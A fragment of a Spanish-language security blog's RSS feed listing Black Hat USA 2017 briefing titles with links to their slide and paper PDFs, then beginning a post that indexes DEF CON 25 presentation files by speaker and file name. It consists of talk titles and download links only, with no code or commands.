&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Continella-ShieldFS-The-Last-Word-In-Ransomware-Resilient-Filesystems.pdf"&gt;Continella-ShieldFS-The-Last-Word-In-Ransomware-Resilient-Filesystems.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Continella-ShieldFS-The-Last-Word-In-Ransomware-Resilient-Filesystems-wp.pdf"&gt;Continella-ShieldFS-The-Last-Word-In-Ransomware-Resilient-Filesystems-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Skype &amp;amp; Type: Keystroke Leakage over VoIP

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Lain-Skype-&amp;amp;-Type-Keystroke-Leakage-Over-VoIP.pdf"&gt;Lain-Skype-&amp;amp;-Type-Keystroke-Leakage-Over-VoIP.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Smoothie Social (Sponsored by Bromium Proofpoint Inc. Rapid7 SentinelOne Trend Micro Webroot StackPath &amp;amp; Tanium)&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;So You Want to Market Your Security Product…

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Alva-So-You-Want-To-Market-Your-Security-Product.pdf"&gt;Alva-So-You-Want-To-Market-Your-Security-Product.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Sonic Gun to Smart Devices: Your Devices Lose Control Under Ultrasound/Sound

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Wang-Sonic-Gun-To-Smart-Devices-Your-Devices-Lose-Control-Under-Ultrasound-Or-Sound.pdf"&gt;Wang-Sonic-Gun-To-Smart-Devices-Your-Devices-Lose-Control-Under-Ultrasound-Or-Sound.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Splunking Dark Tools - A Pentesters Guide to Pwnage Visualization

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Bates-Splunking-Dark-Tools-A-Pentesters-Guide-To-Pwnage-Visualization.pdf"&gt;Bates-Splunking-Dark-Tools-A-Pentesters-Guide-To-Pwnage-Visualization.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;SS7 Attacker Heaven Turns into Riot: How to Make Nation-State and Intelligence Attackers’ Lives Much Harder on Mobile Networks

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Kacer-SS7-Attacker-Heaven-Turns-Into-Riot-How-To-Make-Nation-State-And-Intelligence-Attackers-Lives-Much-Harder-On-Mobile-Networks.pdf"&gt;Kacer-SS7-Attacker-Heaven-Turns-Into-Riot-How-To-Make-Nation-State-And-Intelligence-Attackers-Lives-Much-Harder-On-Mobile-Networks.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Kacer-SS7-Attacker-Heaven-Turns-Into-Riot-How-To-Make-Nation-State-And-Intelligence-Attackers-Lives-Much-Harder-On-Mobile-Networks-wp.pdf"&gt;Kacer-SS7-Attacker-Heaven-Turns-Into-Riot-How-To-Make-Nation-State-And-Intelligence-Attackers-Lives-Much-Harder-On-Mobile-Networks-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Taking DMA Attacks to the Next Level: How to do Arbitrary Memory 
Reads/Writes in a Live and Unmodified System Using a Rogue Memory 
Controller&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Taking Over the World Through MQTT - Aftermath

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Lundgren-Taking-Over-The-World-Through-Mqtt-Aftermath.pdf"&gt;Lundgren-Taking-Over-The-World-Through-Mqtt-Aftermath.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Taking Windows 10 Kernel Exploitation to the Next Level – Leveraging Write-What-Where Vulnerabilities in Creators Update

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Schenk-Taking-Windows-10-Kernel-Exploitation-To-The-Next-Level%E2%80%93Leveraging-Write-What-Where-Vulnerabilities-In-Creators-Update.pdf"&gt;Schenk-Taking-Windows-10-Kernel-Exploitation-To-The-Next-Level–Leveraging-Write-What-Where-Vulnerabilities-In-Creators-Update.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Schenk-Taking-Windows-10-Kernel-Exploitation-To-The-Next-Level%E2%80%93Leveraging-Write-What-Where-Vulnerabilities-In-Creators-Update-wp.pdf"&gt;Schenk-Taking-Windows-10-Kernel-Exploitation-To-The-Next-Level–Leveraging-Write-What-Where-Vulnerabilities-In-Creators-Update-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;The Active Directory Botnet

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Miller-The-Active-Directory-Botnet"&gt;Miller-The-Active-Directory-Botnet&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;The Adventures of AV and the Leaky Sandbox

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Kotler-The-Adventures-Of-Av-And-The-Leaky-Sandbox.pdf"&gt;Kotler-The-Adventures-Of-Av-And-The-Leaky-Sandbox.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Kotler-The-Adventures-Of-Av-And-The-Leaky-Sandbox-wp.pdf"&gt;Kotler-The-Adventures-Of-Av-And-The-Leaky-Sandbox-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;The Art of Securing 100 Products

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Valtman-The-Art-Of-Securing-100-Products.pdf"&gt;Valtman-The-Art-Of-Securing-100-Products.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;The Avalanche Takedown: Landslide for Law Enforcement&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;The Epocholypse 2038: What’s in Store for the Next 20 Years

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Hypponen-The-Epocholypse-2038-Whats-In-Store-For-The-Next-20-Years.pdf"&gt;Hypponen-The-Epocholypse-2038-Whats-In-Store-For-The-Next-20-Years.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;The Future of ApplePwn - How to Save Your Money

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Yunusov-The-Future-Of-Applepwn-How-To-Save-Your-Money.pdf"&gt;Yunusov-The-Future-Of-Applepwn-How-To-Save-Your-Money.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;The Industrial Revolution of Lateral Movement

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Beery-The-Industrial-Revolution-Of-Lateral-Movement.pdf"&gt;Beery-The-Industrial-Revolution-Of-Lateral-Movement.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;The Origin of Array [@@species]: How Standards Drive Bugs in Script Engines

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Silvanovich-The-Origin-Of-Array-Symbol-Species.pdf"&gt;Silvanovich-The-Origin-Of-Array-Symbol-Species.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;The Shadow Brokers – Cyber Fear Game-Changers&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;They’re Coming for Your Tools: Exploiting Design Flaws for Active Intrusion Prevention&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Tracking Ransomware End to End

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Invernizzi-Tracking-Ransomware-End-To-End.pdf"&gt;Invernizzi-Tracking-Ransomware-End-To-End.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Web Cache Deception Attack

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack.pdf"&gt;Gil-Web-Cache-Deception-Attack.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack-wp.pdf"&gt;Gil-Web-Cache-Deception-Attack-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Well that Escalated Quickly! How Abusing Docker API Led to Remote 
Code Execution Same Origin Bypass and Persistence in the Hypervisor via 
Shadow Containers

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence.pdf"&gt;Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf"&gt;Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;What They’re Teaching Kids These Days: Comparing Security Curricula and Accreditations to Industry Needs

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Sanders-What-They%27re-Teaching-Kids-These-Days-Comparing-Security-Curricula-And-Accreditations-To-Industry-Needs.pdf"&gt;Sanders-What-They’re-Teaching-Kids-These-Days-Comparing-Security-Curricula-And-Accreditations-To-Industry-Needs.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;What’s on the Wireless? Automating RF Signal Identification

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Ossmann-Whats-On-The-Wireless-Automating-RF-Signal-Identification.pdf"&gt;Ossmann-Whats-On-The-Wireless-Automating-RF-Signal-Identification.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Ossmann-Whats-On-The-Wireless-Automating-RF-Signal-Identification-wp.pdf"&gt;Ossmann-Whats-On-The-Wireless-Automating-RF-Signal-Identification-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;When IoT Attacks: Understanding the Safety Risks Associated with Connected Devices

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Rios-When-IoT-Attacks-Understanding-The-Safety-Risks-Associated-With-Connected-Devices.pdf"&gt;Rios-When-IoT-Attacks-Understanding-The-Safety-Risks-Associated-With-Connected-Devices.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Rios-When-IoT-Attacks-Understanding-The-Safety-Risks-Associated-With-Connected-Devices-wp.pdf"&gt;Rios-When-IoT-Attacks-Understanding-The-Safety-Risks-Associated-With-Connected-Devices-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;White Hat Privilege:  The Legal Landscape for a Cybersecurity Professional Seeking to Safeguard Sensitive Client Data

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Osborn-White-Hat-Privilege-The-Legal-Landscape-For-A-Cybersecurity-Professional-Seeking-To-Safeguard-Sensitive-Client-Data.pdf"&gt;Osborn-White-Hat-Privilege-The-Legal-Landscape-For-A-Cybersecurity-Professional-Seeking-To-Safeguard-Sensitive-Client-Data.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Why Most Cyber Security Training Fails and What We Can Do About it&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;WiFuzz: Detecting and Exploiting Logical Flaws in the Wi-Fi Cryptographic Handshake

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Ventura-Theyre-Coming-For-Your-Tools-Exploiting-Design-Flaws-For-Active-Intrusion-Prevention.pdf"&gt;Ventura-Theyre-Coming-For-Your-Tools-Exploiting-Design-Flaws-For-Active-Intrusion-Prevention.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Ventura-Theyre-Coming-For-Your-Tools-Exploiting-Design-Flaws-For-Active-Intrusion-Prevention-wp.pdf"&gt;Ventura-Theyre-Coming-For-Your-Tools-Exploiting-Design-Flaws-For-Active-Intrusion-Prevention-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Vanhoef-WiFuzz-Detecting-And-Exploiting-Logical-Flaws-In-The-Wi-Fi-Cryptographic-Handshake-tools.zip"&gt;Vanhoef-WiFuzz-Detecting-And-Exploiting-Logical-Flaws-In-The-Wi-Fi-Cryptographic-Handshake-tools.zip&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Wire Me Through Machine Learning

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Singh-Wire-Me-Through-Machine-Learning.pdf"&gt;Singh-Wire-Me-Through-Machine-Learning.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;WSUSpendu: How to Hang WSUS Clients

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Coltel-WSUSpendu-Use-WSUS-To-Hang-Its-Clients.pdf"&gt;Coltel-WSUSpendu-Use-WSUS-To-Hang-Its-Clients.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Coltel-WSUSpendu-Use-WSUS-To-Hang-Its-Clients-wp.pdf"&gt;Coltel-WSUSpendu-Use-WSUS-To-Hang-Its-Clients-wp.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Zero Days Thousands of Nights: The Life and Times of Zero-Day Vulnerabilities and Their Exploits

&lt;/div&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Ablon-Zero-Days-Thousands-Of-Nights-The-Life-And-Times-Of-Zero-Day-Vulnerabilities-And-Their-Exploits.pdf"&gt;Ablon-Zero-Days-Thousands-Of-Nights-The-Life-And-Times-Of-Zero-Day-Vulnerabilities-And-Their-Exploits.pdf&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Fuente:&lt;/b&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.blackhat.com/us-17/briefings.html" target="_blank"&gt;https://www.blackhat.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.cyberhades.com/2017/07/28/presentaciones-black-hat-usa-2017/" rel="nofollow" target="_blank"&gt;https://www.cyberhades.com&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxgmovJGCe7INep7Nfh8eHYyHck5EYxJD1szgZkTRKG6TU5VkfIF7PLCqjUOGC0_VEBjiWYesL5zc6Es4I6l_fcx4eHHW5hg8uVMCbyYlYNp-tCDWfSEw94mfTASbgKgAIGi_KiYd9ioO8/s72-c/black-hat-usa-2017.png" width="72"/></item><item><title>Presentaciones de la DEF CON 25 (PDF)</title><link>http://www.blackploit.com/2017/07/presentaciones-de-la-def-con-25-pdf.html</link><category>Black Hat</category><category>Conference</category><category>DEFCON</category><category>Paper</category><category>Presentaciones</category><category>Seguridad</category><category>Seguridad Web</category><category>Textos</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Mon, 31 Jul 2017 10:49:00 -0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-4475830606250703249</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg93C5xxIMLgy_81ZeBqcqok9qFh5ahFPz5pLSAXyykuCvdNv-cuf4zZuJlV6Nu9xG9dZixU6LghBp_vfi2ScjAMyikifXLjGP1QdHhfAgt0PJyNMabvE2fPgSkyaxL8mol_t7UU7vZ53ii/s1600/DEFCON25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="653" data-original-width="1200" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg93C5xxIMLgy_81ZeBqcqok9qFh5ahFPz5pLSAXyykuCvdNv-cuf4zZuJlV6Nu9xG9dZixU6LghBp_vfi2ScjAMyikifXLjGP1QdHhfAgt0PJyNMabvE2fPgSkyaxL8mol_t7UU7vZ53ii/s640/DEFCON25.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Sin lugar a duda &lt;b&gt;DEF CON&lt;/b&gt; es la conferencia de&lt;i&gt;&lt;b&gt; seguridad informática y hacking&lt;/b&gt;&lt;/i&gt; más grande y con los mejores exponentes a nivel mundial. En esta ocasión les traigo las &lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/" rel="nofollow" target="_blank"&gt;presentaciones de la versión 25&lt;/a&gt; de este encuentro. Vale la pena revisarlas para entender a que amenazas nos enfrentamos hoy en día. Espero las disfruten:&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;table id="list"&gt;&lt;thead&gt;
&lt;tr&gt;&lt;th&gt;File Name&lt;/th&gt;&lt;th&gt;Tamaño Archivo&lt;/th&gt;&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/5A1F/" title="5A1F"&gt;5A1F/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Cheng%20Lei/" title="Cheng Lei"&gt;Cheng Lei/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Denton%20Gentry/" title="Denton Gentry"&gt;Denton Gentry/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Dimitry%20Snezhkov/" title="Dimitry Snezhkov"&gt;Dimitry Snezhkov/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Dor%20Azouri/" title="Dor Azouri"&gt;Dor Azouri/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Duncan%20Woodbury%20and%20Nicholas%20Haltmeyer/" title="Duncan Woodbury and Nicholas Haltmeyer"&gt;Duncan Woodbury and Nicholas Haltmeyer/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Itzik%20Kotler%20and%20Amit%20Klein/" title="Itzik Kotler and Amit Klein"&gt;Itzik Kotler and Amit Klein/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Josh%20Pitts/" title="Josh Pitts"&gt;Josh Pitts/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Mark%20Newlin%20Logan%20Lamb%20and%20Christopher%20Grayson/" title="Mark Newlin Logan Lamb and Christopher Grayson"&gt;Mark Newlin Logan Lamb and Christopher Grayson/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Matt%20Knight%20and%20Marc%20Newlin/" title="Matt Knight and Marc Newlin"&gt;Matt Knight and Marc Newlin/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Matt%20Suiche/" title="Matt Suiche"&gt;Matt Suiche/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Morten%20Schenk/" title="Morten Schenk"&gt;Morten Schenk/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Phillip%20Tully%20and%20Michael%20Raggo/" title="Phillip Tully and Michael Raggo"&gt;Phillip Tully and Michael Raggo/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Romain%20Coltel%20and%20Yves%20Le%20Provost/" title="Romain Coltel and Yves Le Provost"&gt;Romain Coltel and Yves Le Provost/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Steinthor%20Bjarnason%20and%20Jason%20Jones/" title="Steinthor Bjarnason and Jason Jones"&gt;Steinthor Bjarnason and Jason Jones/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Tomer%20Cohen/" title="Tomer Cohen"&gt;Tomer Cohen/&lt;/a&gt;&lt;/td&gt;&lt;td&gt;-&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-0ctane-Untrustworthy-Hardware.pdf" title="DEFCON-25-0ctane-Untrustworthy-Hardware.pdf"&gt;DEFCON-25-0ctane-Untrustworthy-Hardware.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.5 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Alvaro-Munoz-JSON-attacks.pdf" title="DEFCON-25-Alvaro-Munoz-JSON-attacks.pdf"&gt;DEFCON-25-Alvaro-Munoz-JSON-attacks.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;1.8 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Andrew-Robbins-and-Will-Schroeder-An-Ace-Up-The-Sleeve.pdf" title="DEFCON-25-Andrew-Robbins-and-Will-Schroeder-An-Ace-Up-The-Sleeve.pdf"&gt;DEFCON-25-Andrew-Robbins-and-Will-Schroeder-An-Ace-Up-The-Sleeve.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;3.0 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Artem-Kondratenko-Cisco-Catalyst-Exploitation.pdf" title="DEFCON-25-Artem-Kondratenko-Cisco-Catalyst-Exploitation.pdf"&gt;DEFCON-25-Artem-Kondratenko-Cisco-Catalyst-Exploitation.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.5 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Ayoul3-Dealing-the-Perfect-Hand-Shuffling-memory-blocks-on-zOS.pdf" title="DEFCON-25-Ayoul3-Dealing-the-Perfect-Hand-Shuffling-memory-blocks-on-zOS.pdf"&gt;DEFCON-25-Ayoul3-Dealing-the-Perfect-Hand-Shuffling-memory-blocks-on-zOS.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;3.2 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Caleb-Madrigal-IOT-Hacking-With-SDR.pdf" title="DEFCON-25-Caleb-Madrigal-IOT-Hacking-With-SDR.pdf"&gt;DEFCON-25-Caleb-Madrigal-IOT-Hacking-With-SDR.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;4.3 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Chris-Thompson-MS-Just-Gave-The-Blue-Teams-Tactical-Nukes.pdf" title="DEFCON-25-Chris-Thompson-MS-Just-Gave-The-Blue-Teams-Tactical-Nukes.pdf"&gt;DEFCON-25-Chris-Thompson-MS-Just-Gave-The-Blue-Teams-Tactical-Nukes.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.4 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Christopher-Domas-Breaking-The-x86-ISA.pdf" title="DEFCON-25-Christopher-Domas-Breaking-The-x86-ISA.pdf"&gt;DEFCON-25-Christopher-Domas-Breaking-The-x86-ISA.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;5.0 MiB&lt;/td&gt;&lt;/tr&gt;
